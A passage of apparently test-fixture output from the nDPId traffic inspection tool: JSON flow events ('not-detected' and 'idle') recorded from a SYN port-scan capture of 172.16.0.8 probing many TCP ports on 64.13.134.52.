-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 